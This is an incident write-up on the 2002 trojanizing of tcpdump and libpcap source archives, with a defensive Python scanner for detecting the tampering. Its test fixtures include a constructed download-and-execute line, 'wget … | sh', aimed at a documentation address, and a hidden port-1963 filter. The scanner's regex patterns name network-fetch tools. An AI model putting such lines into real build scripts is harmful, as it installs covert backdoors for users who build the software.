Open Source · 2002-11-11 · 2 days · Backdoor, Remote Code Execution

tcpdump.org source tarballs trojanized

The tcpdump.org distribution site was compromised in November 2002, and source archives for tcpdump and libpcap were replaced with trojanized versions.

Story

In November 2002, the HTTP distribution path on tcpdump.org began serving trojaned source archives for both tcpdump and libpcap. CERT and CIAC identified modified copies of tcpdump-3.6.2.tar.gz, tcpdump-3.7.1.tar.gz, and libpcap-0.7.1.tar.gz; the poisoned archives were available from around 10:14 GMT on November 11 until they were taken down at 15:05:19 GMT on November 13.

The compromise spanned two related packages. tcpdump carried build-time code that fetched, compiled, and ran a payload; libpcap, the packet capture library beneath it, was modified so that traffic on the port the payload used would not be captured.

This compromise was more elaborate than a single hidden shell. The tcpdump configure script attempted to fetch a shell script named services over HTTP, generate conftes.c from it, compile it, and run it. The resulting program connected to a fixed address on TCP/1963 and accepted single-byte commands to exit, sleep, or spawn an obfuscated shell. libpcap was changed in gencode.c, its BPF filter compiler, to exclude port 1963 from captures, so the sniffer itself would not show the backdoor's traffic.

That pairing is why the incident still stands out. The attacker did not just backdoor a network diagnostic tool; they also altered the capture library beneath it so the diagnostic stack was less likely to show the backdoor's own traffic. Verification therefore had to cover both archives, not only the tcpdump source.
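The two checks a practitioner would want after an incident like this, as an added example (not code from tcpdump.org, CERT, or the advisory): a checksum comparison of every downloaded archive against a trusted manifest, and a content scan of the files the trojan touched (configure for a download-and-execute step, gencode.c for a hard-coded port exclusion). The indicator patterns are assumptions modelled on the description above, not the trojan's literal source text, and the sample archives and manifest are constructed in memory so the script runs offline.

```python
import hashlib
import io
import re
import tarfile

# Indicator patterns. These are assumptions modelled on the behaviour described
# in the story above (fetch "services" over HTTP, generate and run conftes.c,
# filter port 1963), not the trojan's literal source text. They are coarse
# heuristics and would need tuning against real source trees.
CONFIGURE_INDICATORS = {
    "network fetch from build script": re.compile(
        r"\b(wget|curl|fetch|lynx|ftp)\b[^\n]*https?://", re.I),
    "non-autoconf generated C file (conftes.c)": re.compile(r"\bconftes\.c\b"),
    "services script referenced": re.compile(r"/services\b"),
}
GENCODE_INDICATORS = {
    "hard-coded port 1963 in filter compiler": re.compile(r"\b1963\b"),
}
WATCHED = {"configure": CONFIGURE_INDICATORS, "gencode.c": GENCODE_INDICATORS}


def scan_tarball(data: bytes) -> dict:
    """Return {member path: [indicator labels]} for watched files that match."""
    hits = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            patterns = WATCHED.get(member.name.rsplit("/", 1)[-1])
            if not patterns:
                continue
            text = tar.extractfile(member).read().decode("latin-1")
            found = [label for label, rx in patterns.items() if rx.search(text)]
            if found:
                hits[member.name] = found
    return hits


def verify_checksums(archives: dict, manifest: dict) -> list:
    """Archive names whose SHA-256 differs from, or is absent in, a trusted manifest."""
    return sorted(name for name, data in archives.items()
                  if hashlib.sha256(data).hexdigest() != manifest.get(name))


def audit(archives: dict, manifest: dict) -> dict:
    """Run both checks over every archive; libpcap is covered, not only tcpdump."""
    return {
        "indicators": {name: scan_tarball(data) for name, data in archives.items()},
        "checksum_mismatch": verify_checksums(archives, manifest),
    }


def make_tarball(files: dict) -> bytes:
    """Build a gzip tarball in memory from {path: text} (test fixture helper)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            payload = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed sample contents (not the real 2002 files). The "trojaned" configure
# mimics the described fetch-compile-run step; the trojaned gencode.c carries a
# hard-coded port exclusion. 192.0.2.10 is a documentation address.
CLEAN_CONFIGURE = ("#! /bin/sh\n# Guess values for system-dependent variables.\n"
                   "cat > conftest.c <<EOF\nint main(){return 0;}\nEOF\n$CC conftest.c\n")
TROJAN_CONFIGURE = (CLEAN_CONFIGURE +
                    "wget -q http://192.0.2.10/services -O - | sh\n"
                    "$CC -o conftes conftes.c && ./conftes\n")
CLEAN_GENCODE = "/* BPF code generator */\nstruct block *gen_port(int port);\n"
TROJAN_GENCODE = CLEAN_GENCODE + "/* skip our own traffic */ if (port == 1963) return NULL;\n"

CLEAN_ARCHIVES = {
    "tcpdump-3.7.1.tar.gz": make_tarball({"tcpdump-3.7.1/configure": CLEAN_CONFIGURE}),
    "libpcap-0.7.1.tar.gz": make_tarball({"libpcap-0.7.1/configure": CLEAN_CONFIGURE,
                                         "libpcap-0.7.1/gencode.c": CLEAN_GENCODE}),
}
SAMPLE_ARCHIVES = {
    "tcpdump-3.7.1.tar.gz": make_tarball({"tcpdump-3.7.1/configure": TROJAN_CONFIGURE}),
    "libpcap-0.7.1.tar.gz": make_tarball({"libpcap-0.7.1/configure": CLEAN_CONFIGURE,
                                         "libpcap-0.7.1/gencode.c": TROJAN_GENCODE}),
}
# Trusted manifest, derived here from the clean fixtures; in practice it comes
# from an out-of-band source (signed release notes, a mirror you already trust).
TRUSTED_MANIFEST = {name: hashlib.sha256(data).hexdigest()
                    for name, data in CLEAN_ARCHIVES.items()}

if __name__ == "__main__":
    for key, value in audit(SAMPLE_ARCHIVES, TRUSTED_MANIFEST).items():
        print(key, value)
```

The checksum check is the one that actually settles the question when a trusted manifest exists; the content scan is there for the case this incident illustrates, where the archives were swapped on the primary site and a downloader may have no independent hashes yet. Note that the scan deliberately keys on libpcap's gencode.c as well as tcpdump's configure: a tcpdump-only review would have passed the modified capture library.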

Affected Artifacts

Incident Context

Motive
Unauthorized Access
Cause
Compromised Infrastructure
Transitive
No

External References

Source record: oss/attacks/tcpdump-libpcap/meta.yaml